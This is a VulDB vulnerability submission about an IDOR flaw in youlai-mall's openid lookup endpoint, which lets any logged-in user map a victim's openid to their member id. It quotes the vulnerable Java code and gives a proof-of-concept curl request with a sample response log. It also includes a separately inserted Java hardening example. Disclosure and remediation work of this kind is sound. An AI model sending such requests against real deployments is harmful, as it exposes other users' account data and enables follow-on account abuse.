Submission #708177: youlai-mall latest Improper Control of Resource Identifiers Info

Title: youlai-mall latest Improper Control of Resource Identifiers
Description:

# youlai-mall improper access control and business logic flaw exposes openid→memberId mapping via GET /mall-ums/app-api/v1/members/openid/{openid}, enabling horizontal privilege escalation and unauthorized operations on victim accounts

## Contributors: Huang Weigang

### 1. Vulnerability Impact

- youlai-mall (latest)
- `https://github.com/youlaitech/youlai-mall`

### 2. Vulnerability Location

- GET `/mall-ums/app-api/v1/members/openid/{openid}`

### 3. Code Analysis

- File: `mall-ums/ums-boot/src/main/java/com/youlai/mall/ums/controller/app/MemberController.java`
- Route and method:

```java
@GetMapping("/openid/{openid}")
public Result<MemberAuthDTO> getMemberByOpenid(@PathVariable String openid) {
    MemberAuthDTO memberAuthInfo = memberService.getMemberByOpenid(openid);
    return Result.success(memberAuthInfo);
}
```

- Service: `mall-ums/ums-boot/src/main/java/com/youlai/mall/ums/service/impl/UmsMemberServiceImpl.java`

```java
public MemberAuthDTO getMemberByOpenid(String openid) {
    UmsMember entity = this.getOne(new LambdaQueryWrapper<UmsMember>()
            .eq(UmsMember::getOpenid, openid)
            .select(UmsMember::getId, UmsMember::getOpenid, UmsMember::getStatus));
    ...
    return memberConvert.entity2OpenidAuthDTO(entity);
}
```

- Issues:
  - No ownership check (missing validation that the provided `openid` belongs to the current logged-in member, e.g., binding `openid` to `SecurityUtils.getMemberId()`).
  - No role/permission control (no `@PreAuthorize`; any authenticated App user can query arbitrary `openid`).
  - Overexposed authentication data (returns `MemberAuthDTO` including `id/openid/status` and `username = openid`, enabling account existence mapping).
  - Supports horizontal privilege escalation (attacker supplies victim's `openid` and gains victim's `memberId`, fueling subsequent IDOR/BOLA attacks).
  - Lacks enumeration/rate-limiting and auditing (distinct error code `USER_NOT_EXIST` can be used to validate and enumerate openids).
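The following is an added illustration of the ownership check the "Issues" list asks for; it is not youlai-mall code and is not part of the submission. The classes `MemberAuthDTO`, `AccessDeniedException` and the in-memory member table are hypothetical stand-ins for the project's `MemberAuthDTO`, `UmsMemberServiceImpl` and `SecurityUtils.getMemberId()`, and the two openids and member ids are constructed sample data. It shows the reported lookup pattern next to a hardened variant that only honours an `openid` bound to the calling session and returns the same error for "not yours" and "not found", so the endpoint no longer confirms whether an openid exists.

```java
import java.util.HashMap;
import java.util.Map;
import java.util.Optional;

/**
 * Hypothetical stand-in for the openid lookup in UmsMemberServiceImpl.
 * Plain Java (no Spring) so it compiles and runs on its own; in the real
 * service the same check would sit inside getMemberByOpenid().
 */
public class OpenidLookupHardening {

    /** Minimal stand-in for the project's MemberAuthDTO (id, openid, status). */
    public static final class MemberAuthDTO {
        public final long id;
        public final String openid;
        public final int status;

        MemberAuthDTO(long id, String openid, int status) {
            this.id = id;
            this.openid = openid;
            this.status = status;
        }
    }

    /** One exception for both "foreign openid" and "unknown openid", so the caller cannot tell them apart. */
    public static final class AccessDeniedException extends RuntimeException {
        AccessDeniedException() {
            super("access denied");
        }
    }

    /** Constructed sample member table keyed by openid (stand-in for the ums_member table). */
    private final Map<String, MemberAuthDTO> membersByOpenid = new HashMap<>();

    public OpenidLookupHardening() {
        membersByOpenid.put("openid-of-user-a", new MemberAuthDTO(1001L, "openid-of-user-a", 1));
        membersByOpenid.put("openid-of-user-b", new MemberAuthDTO(1002L, "openid-of-user-b", 1));
    }

    /** The pattern reported on the page: lookup by caller-supplied openid with no ownership check. */
    public Optional<MemberAuthDTO> vulnerableLookup(String openid) {
        return Optional.ofNullable(membersByOpenid.get(openid));
    }

    /**
     * Hardened variant: the path openid is honoured only if the record it names
     * belongs to the member id bound to the current session (the value
     * SecurityUtils.getMemberId() would supply). A mismatch and a miss both
     * raise the same AccessDeniedException, removing the USER_NOT_EXIST oracle.
     */
    public MemberAuthDTO hardenedLookup(String openid, long currentMemberId) {
        MemberAuthDTO member = membersByOpenid.get(openid);
        if (member == null || member.id != currentMemberId) {
            throw new AccessDeniedException();
        }
        return member;
    }

    /** Simplest fix of all: drop the path parameter and resolve the record from the session alone. */
    public MemberAuthDTO currentMemberAuth(long currentMemberId) {
        return membersByOpenid.values().stream()
                .filter(m -> m.id == currentMemberId)
                .findFirst()
                .orElseThrow(AccessDeniedException::new);
    }

    public static void main(String[] args) {
        OpenidLookupHardening svc = new OpenidLookupHardening();
        long sessionOfUserA = 1001L; // member id bound to user A's token

        // Reported behaviour: user A reads user B's record (prints 1002).
        System.out.println("vulnerable: " + svc.vulnerableLookup("openid-of-user-b").map(m -> m.id).orElse(-1L));

        // Hardened: user A asking for user B's openid is denied.
        try {
            svc.hardenedLookup("openid-of-user-b", sessionOfUserA);
        } catch (AccessDeniedException e) {
            System.out.println("hardened, foreign openid: " + e.getMessage());
        }

        // Hardened: user A asking for an unknown openid gets the identical answer.
        try {
            svc.hardenedLookup("no-such-openid", sessionOfUserA);
        } catch (AccessDeniedException e) {
            System.out.println("hardened, unknown openid: " + e.getMessage());
        }

        // Hardened: user A's own record is still served (prints 1001).
        System.out.println("hardened, own openid: " + svc.hardenedLookup("openid-of-user-a", sessionOfUserA).id);
        System.out.println("session-only lookup: " + svc.currentMemberAuth(sessionOfUserA).id);
    }
}
```

Compile and run with `javac OpenidLookupHardening.java && java OpenidLookupHardening`. Of the two hardened methods, the session-only `currentMemberAuth` is the smaller change to reason about, because the client no longer supplies an identifier at all; `hardenedLookup` is the shape to use if the path parameter must stay for API compatibility.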
### Vulnerability Reproduction

#### Preconditions

- Attacker has a valid App login token (`Authorization: Bearer <token>`).
- Victim's `openid` is known or discoverable (social binding, logs, UI exposure, external sources).
- Target Endpoint: `GET /mall-ums/app-api/v1/members/openid/{openid}`

#### Steps (horizontal privilege escalation: fetch another user's auth info)

- Log in as User A and obtain a valid token.
- Call the endpoint with User B's `openid`:
  - `curl -X GET -H "Authorization: Bearer <token>" "https://<gateway>/mall-ums/app-api/v1/members/openid/ovO2TxVictimOpenId123"`
- Observe a 200 OK response, for example:
  - `{"code":"00000","data":{"id":12345,"username":"ovO2TxVictimOpenId123","status":1},"msg":"一切ok"}`
- Outcome: Without any ownership validation, the attacker can learn the `memberId ↔ openid` mapping for the victim, enabling targeted abuse against other vulnerable App endpoints (balances, orders, addresses) that rely on predictable IDs.

#### Example request/response log (reference)

```json
{
  "data": {
    "request_data": {
      "method": "GET",
      "url": "http://10.15.196.160:9999/mall-ums/app-api/v1/members/openid/ovO2TxVictimOpenId123",
      "params": {},
      "json": {},
      "data": {},
      "files": {}
    },
    "response_data": {
      "code": "00000",
      "data": {"id": 12345, "username": "ovO2TxVictimOpenId123", "status": 1},
      "msg": "一切ok"
    }
  },
  "test": {
    "request_data": {
      "method": "GET",
      "url": "http://10.15.196.160:9999/mall-ums/app-api/v1/members/openid/ovO2TxVictimOpenId123",
      "params": {},
      "json": {},
      "data": {},
      "files": {}
    },
    "response_data": {
      "code": "00000",
      "data": {"id": 12345, "username": "ovO2TxVictimOpenId123", "status": 1},
      "msg": "一切ok"
    }
  }
}
```

### 4. Impact Description

- Unauthorized authentication data disclosure
  - Any logged-in user can retrieve another user's `MemberAuthDTO` via `openid`, exposing `memberId` mapping and privacy-sensitive identifiers.
- Horizontal privilege escalation enabler
  - The `memberId ↔ openid` mapping powers subsequent IDOR/BOLA attacks on balance, order, and address endpoints, dramatically lowering attack complexity.
- Account existence enumeration
  - Distinct success/error responses allow attackers to validate openids at scale, facilitating profiling and targeted exploitation.
- Compliance and risk control issues
  - Exposes social unique identifier to internal account mapping without necessity; lacks rate limits, audit trails, and anomaly detection.
- Expanded attack surface and chain amplification
  - When chained with other horizontally vulnerable endpoints (e.g., balance deduct, order delete/pay), attackers can systematically manipulate victim accounts.
- System trust erosion
  - Authentication-related interfaces should be restricted or internal-only; current design blurs identity-resource boundaries and undermines security posture.
Source: ⚠️ https://github.com/Hwwg/cve/issues/28
User: huangweigang (UID 88993)
Submitted: 2025-12-07 07:05 (6 months ago)
Moderation: 2025-12-25 10:50 (18 days later)
Status: Duplicate
VulDB entry: 334477 [youlaitech youlai-mall 1.0.0/2.0.0 openid privilege escalation]
Points: 0
